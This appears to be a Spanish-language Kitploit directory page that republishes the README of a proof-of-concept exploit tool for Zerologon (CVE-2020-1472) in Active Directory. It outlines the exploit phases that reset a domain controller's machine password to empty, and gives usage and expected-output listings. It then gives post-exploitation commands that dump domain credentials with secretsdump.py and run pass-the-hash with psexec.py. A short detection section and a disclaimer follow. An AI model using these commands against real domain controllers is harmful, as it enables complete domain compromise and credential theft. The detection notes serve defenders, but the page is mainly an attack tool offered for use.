Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
ZeroLogon-PoC-DC-Pwn — Zerologon (CVE-2020-1472) Aplicación de Prueba de Concepto - Herramienta de explotación de vulnerabilidad crítica de Active Directory. | Kitploit
Herramientas/GitHubGitHub/mods20hh/zerologon-poc-dc-pwn
Escalada de PrivilegiosAtaques de ContraseñasAnálisis de VulnerabilidadesExplotaciónPost-ExplotaciónPruebas de PenetraciónPapers e InvestigaciónAprendizaje y EducaciónRed Teaming
GitHubmods20hh/zerologon-poc-dc-pwn

ZeroLogon-PoC-DC-Pwn

Zerologon (CVE-2020-1472) Aplicación de Prueba de Concepto - Herramienta de explotación de vulnerabilidad crítica de Active Directory.

43hace 25 díasAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio

Zerologon (CVE-2020-1472)

Resumen

Este proyecto es una implementación de la vulnerabilidad Zerologon (CVE-2020-1472), una de las vulnerabilidades de seguridad más críticas de Active Directory. Esta vulnerabilidad permite a un atacante no autenticado comprometer todo el dominio de Active Directory restableciendo la contraseña de la cuenta de máquina del Controlador de Dominio.

Puntuación CVSS: 10.0 (Crítica)

¿Qué es Zerologon?

Zerologon es un fallo criptográfico en el Protocolo Remoto Netlogon de Microsoft (MS-NRPC). La vulnerabilidad existe en la forma en que Netlogon utiliza el cifrado AES-CFB8 con un vector de inicialización (IV) codificado de cero.

Resumen técnico:

  • El protocolo Netlogon utiliza un mecanismo de autenticación challenge-response
  • Debido a una implementación criptográfica incorrecta, un desafío de todo ceros tiene una probabilidad de 1/256 de producir una autenticación válida
  • Un atacante puede enviar ~2000 intentos de autenticación para explotar este fallo de manera confiable
  • Una vez autenticado, el atacante puede restablecer la contraseña de la cuenta de máquina del Controlador de Dominio a un valor conocido (hash vacío)

Cómo funciona

root@kitploit:~
1. Selección del Objetivo
   └─> Identificar el Controlador de Dominio (FQDN, nombre NetBIOS, cuenta de máquina)

2. Fase de Desafío (I_NetServerReqChallenge)
   └─> Enviar desafío de cliente todo ceros (0x0000000000000000)
   └─> Recibir desafío del servidor

3. Fase de Autenticación (I_NetServerAuthenticate2)
   └─> Intentar autenticación con credenciales nulas
   └─> Repetir hasta tener éxito (~1/256 de tasa de éxito por intento)

4. Fase de Restablecimiento de Contraseña (I_NetServerPasswordSet2)
   └─> Restablecer la contraseña de la cuenta de máquina del DC a vacío
   └─> Nuevo hash NT: 31d6cfe0d16ae931b73c59d7e0c089c0 (contraseña vacía)

5. Post-Explotación
   └─> Usar Pass-the-Hash con credenciales vacías
   └─> Se logra el compromiso total del dominio

Compilación del Proyecto

Requisitos previos

  • Entorno de desarrollo de Windows (Windows 10/11)
  • Visual Studio 2022
  • Windows SDK

Compilación

Usando Visual Studio:

root@kitploit:~
1. Open Visual Studio
2. Select **Build Solution** from the **Build** menu.

Uso

root@kitploit:~
Zerologon.exe <DC_FQDN> <DC_NetBIOS_Name> <Machine_Account_Name>

Ejemplo:

root@kitploit:~
Zerologon.exe DC01.corp.example.com DC01 DC01$

Parámetros:

  • DC_FQDN: Nombre de dominio completamente calificado (FQDN) del Controlador de Dominio objetivo
  • DC_NetBIOS_Name: Nombre NetBIOS del DC (generalmente el nombre del host)
  • Machine_Account_Name: Nombre de la cuenta de máquina (debe terminar con $)

Resultado esperado:

Explotación exitosa:

root@kitploit:~
[+] Targeting Domain Controller:
    FQDN           : DC01.corp.example.com
    NetBIOS Name   : DC01
    Machine Account: DC01$

[+] SUCCESS: Machine account password reset to empty!
[+] Now use Pass-the-Hash with:
      .\DC01$:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
[+] Then run: secretsdump.py -just-dc <domain>/<dc_account>@<dc_ip>

Explotación fallida (sistema parcheado):

root@kitploit:~
[-] Attack failed after 2000 attempts. Target likely patched.

Post-Explotación

Después de restablecer exitosamente la contraseña del DC, puedes:

  1. Extraer credenciales del dominio:
root@kitploit:~
secretsdump.py -no-pass -just-dc 'DOMAIN/DC01$'@192.168.1.10
  1. Autenticación Pass-the-Hash:
root@kitploit:~
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 'DOMAIN/DC01$'@DC01

Detección

Detección basada en red:

  • Múltiples intentos de autenticación Netlogon fallidos desde una sola fuente
  • Patrones inusuales en el tráfico MS-NRPC
  • Firmas IDS/IPS para explotación de Zerologon

Detección basada en registros:

root@kitploit:~
Event Viewer → Windows Logs → System
- Event ID 5827: Multiple password validation failures
- Event ID 5829: Secure channel reset

Consultas SIEM:

root@kitploit:~
source="WinEventLog:System" EventCode=5827 OR EventCode=5829
| stats count by Computer, SourceIP
| where count > 100

Aviso legal

Esta herramienta se proporciona solo con fines educativos y de investigación de seguridad autorizados.

El autor NO asume ninguna responsabilidad por el mal uso de este código.

Referencias

Recursos oficiales:

  • CVE-2020-1472 - NIST
  • Microsoft Security Advisory
  • Secura Research Paper

Análisis técnico:

  • Microsoft Netlogon Protocol Specification
  • Zerologon Technical Deep Dive

Herramientas:

  • Impacket Toolkit - Para post-explotación
  • Mimikatz - Extracción de credenciales

Licencia

Este proyecto está licenciado bajo la Licencia MIT. Para más información, consulte el archivo LICENSE.

Descargar herramienta